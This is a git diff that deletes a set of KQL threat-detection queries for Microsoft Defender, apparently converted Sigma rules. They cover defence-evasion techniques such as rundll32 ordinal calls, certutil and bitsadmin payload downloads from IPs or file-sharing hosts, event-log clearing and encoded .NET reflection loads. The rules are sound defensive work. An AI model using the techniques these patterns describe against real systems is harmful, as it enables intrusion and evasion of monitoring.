diff --git a/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql b/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql
deleted file mode 100644
index dc599be6..00000000
--- a/Defense Evasion/Suspicious_Advpack_Call_Via_Rundll32.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/17
-// Level: high
-// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql b/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql
deleted file mode 100644
index 48c1c2d1..00000000
--- a/Defense Evasion/Suspicious_AgentExecutor_PowerShell_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards
-// Date: 2022/12/24
-// Level: high
-// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql b/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql
deleted file mode 100644
index 1407fd7f..00000000
--- a/Defense Evasion/Suspicious_Application_Allowed_Through_Exploit_Guard.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey contains "\\Users\\Public" or RegistryKey contains "\\AppData\\Local\\Temp" or RegistryKey contains "\\Desktop" or RegistryKey contains "\\PerfLogs" or RegistryKey contains "\\Windows\\Temp")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql b/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql
deleted file mode 100644
index 55cd2a6a..00000000
--- a/Defense Evasion/Suspicious_Cabinet_File_Execution_Via_Msdt.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113
-// Date: 2022/06/21
-// Level: medium
-// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Calculator_Usage.kql b/Defense Evasion/Suspicious_Calculator_Usage.kql
deleted file mode 100644
index 70fa9441..00000000
--- a/Defense Evasion/Suspicious_Calculator_Usage.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/02/09
-// Level: high
-// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Call_by_Ordinal.kql b/Defense Evasion/Suspicious_Call_by_Ordinal.kql
deleted file mode 100644
index 951412c5..00000000
--- a/Defense Evasion/Suspicious_Call_by_Ordinal.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/22
-// Level: high
-// Description: Detects suspicious calls of DLLs in rundll32.dll exports by ordinal
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql b/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index d6006a54..00000000
--- a/Defense Evasion/Suspicious_Child_Process_Of_BgInfo.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: high
-// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql b/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql
deleted file mode 100644
index b25dfd18..00000000
--- a/Defense Evasion/Suspicious_Child_Process_Of_Wermgr.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\wermgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql b/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql
deleted file mode 100644
index 473e7753..00000000
--- a/Defense Evasion/Suspicious_Child_Process_of_AspNetCompiler.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/14
-// Level: high
-// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe".
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql b/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql
deleted file mode 100644
index 595debb6..00000000
--- a/Defense Evasion/Suspicious_CodePage_Switch_Via_CHCP.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/10/14
-// Level: medium
-// Description: Detects a code page switch in command line or batch scripts to a rare language
-// Tags: attack.t1036, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " 936" or ProcessCommandLine endswith " 1258") and FolderPath endswith "\\chcp.com"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql b/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql
deleted file mode 100644
index 02f15c71..00000000
--- a/Defense Evasion/Suspicious_Control_Panel_DLL_Load.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/04/15
-// Level: high
-// Description: Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\System32\\control.exe") and (not(ProcessCommandLine contains "Shell32.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql b/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql
deleted file mode 100644
index e11f3a48..00000000
--- a/Defense Evasion/Suspicious_Copy_From_or_To_System_Directory.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/07/03
-// Level: medium
-// Description: Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
-Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
-
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "copy " and FolderPath endswith "\\cmd.exe") or ((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains " copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))) and (ProcessCommandLine contains "\\System32" or ProcessCommandLine contains "\\SysWOW64" or ProcessCommandLine contains "\\WinSxS")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql b/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql
deleted file mode 100644
index a0619d77..00000000
--- a/Defense Evasion/Suspicious_Creation_with_Colorcpl.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/21
-// Level: high
-// Description: Once executed, colorcpl.exe will copy the arbitrary file to c:\windows\system32\spool\drivers\color\
-// Tags: attack.defense_evasion, attack.t1564
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\colorcpl.exe" and (not((FolderPath endswith ".icm" or FolderPath endswith ".gmmp" or FolderPath endswith ".cdmp" or FolderPath endswith ".camp")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Csi.exe_Usage.kql b/Defense Evasion/Suspicious_Csi.exe_Usage.kql
deleted file mode 100644
index ea5c49ee..00000000
--- a/Defense Evasion/Suspicious_Csi.exe_Usage.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/17
-// Level: medium
-// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
-// Tags: attack.execution, attack.t1072, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_CustomShellHost_Execution.kql b/Defense Evasion/Suspicious_CustomShellHost_Execution.kql
deleted file mode 100644
index b82c76dd..00000000
--- a/Defense Evasion/Suspicious_CustomShellHost_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the execution of CustomShellHost binary where the child isn't located in 'C:\Windows\explorer.exe'
-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\CustomShellHost.exe" and (not(FolderPath =~ "C:\\Windows\\explorer.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql b/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql
deleted file mode 100644
index 6a1909b6..00000000
--- a/Defense Evasion/Suspicious_DLL_Loaded_via_CertOC.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: high
-// Description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and (ProcessCommandLine contains "\\Appdata\\Local\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Tasks\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql b/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql
deleted file mode 100644
index 69f6a7aa..00000000
--- a/Defense Evasion/Suspicious_Diantz_Alternate_Data_Stream_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "diantz.exe" and ProcessCommandLine contains ".cab") and ProcessCommandLine matches regex ":[^\\\\]"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Double_Extension_Files.kql b/Defense Evasion/Suspicious_Double_Extension_Files.kql
deleted file mode 100644
index 0ef9f5c1..00000000
--- a/Defense Evasion/Suspicious_Double_Extension_Files.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2022/06/19
-// Level: high
-// Description: Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hide default extensions by default.
-// Tags: attack.defense_evasion, attack.t1036.007
-DeviceFileEvents
-| where (FolderPath endswith ".rar.exe" or FolderPath endswith ".zip.exe") or ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and (FolderPath endswith ".exe" or FolderPath endswith ".iso" or FolderPath endswith ".rar" or FolderPath endswith ".zip"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql b/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
deleted file mode 100644
index 194705f0..00000000
--- a/Defense Evasion/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql b/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
deleted file mode 100644
index b4aa432b..00000000
--- a/Defense Evasion/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file from a suspicious domain
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql b/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql
deleted file mode 100644
index 9ce127d5..00000000
--- a/Defense Evasion/Suspicious_Download_Via_Certutil.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the execution of certutil with certain flags that allow the utility to download files.
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and ProcessCommandLine contains "http" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_DumpMinitool_Execution.kql b/Defense Evasion/Suspicious_DumpMinitool_Execution.kql
deleted file mode 100644
index d77e0e31..00000000
--- a/Defense Evasion/Suspicious_DumpMinitool_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/06
-// Level: high
-// Description: Detects suspicious ways to use the "DumpMinitool.exe" binary
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe"))) and ((not((FolderPath contains "\\Microsoft Visual Studio\\" or FolderPath contains "\\Extensions\\"))) or ProcessCommandLine contains ".txt" or ((ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and (not(ProcessCommandLine contains "--dumpType"))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql b/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
deleted file mode 100644
index c8bc79a5..00000000
--- a/Defense Evasion/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql b/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql
deleted file mode 100644
index 700cfc45..00000000
--- a/Defense Evasion/Suspicious_Environment_Variable_Has_Been_Registered.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/20
-// Level: high
-// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey contains "\\Environment"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql b/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql
deleted file mode 100644
index b126c478..00000000
--- a/Defense Evasion/Suspicious_Eventlog_Clear_or_Configuration_Change.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
-// Date: 2019/09/26
-// Level: high
-// Description: Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).
-// Tags: attack.defense_evasion, attack.t1070.001, attack.t1562.002, car.2016-04-002
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "Clear-EventLog " or ProcessCommandLine contains "Remove-EventLog " or ProcessCommandLine contains "Limit-EventLog " or ProcessCommandLine contains "Clear-WinEvent ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "ClearEventLog" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe")) or ((ProcessCommandLine contains "clear-log " or ProcessCommandLine contains " cl " or ProcessCommandLine contains "set-log " or ProcessCommandLine contains " sl " or ProcessCommandLine contains "lfn:") and FolderPath endswith "\\wevtutil.exe")) and (not((ProcessCommandLine contains " sl " and (InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\msiexec.exe", "C:\\Windows\\System32\\msiexec.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Executable_File_Creation.kql b/Defense Evasion/Suspicious_Executable_File_Creation.kql
deleted file mode 100644
index e8188447..00000000
--- a/Defense Evasion/Suspicious_Executable_File_Creation.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/09/05
-// Level: high
-// Description: Detect creation of suspicious executable file names.
-Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.
-
-// Tags: attack.defense_evasion, attack.t1564
-DeviceFileEvents
-| where FolderPath endswith ":\\$Recycle.Bin.exe" or FolderPath endswith ":\\Documents and Settings.exe" or FolderPath endswith ":\\MSOCache.exe" or FolderPath endswith ":\\PerfLogs.exe" or FolderPath endswith ":\\Recovery.exe" or FolderPath endswith ".bat.exe" or FolderPath endswith ".sys.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql b/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql
deleted file mode 100644
index 95f75b3a..00000000
--- a/Defense Evasion/Suspicious_Execution_From_GUID_Like_Folder_Names.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
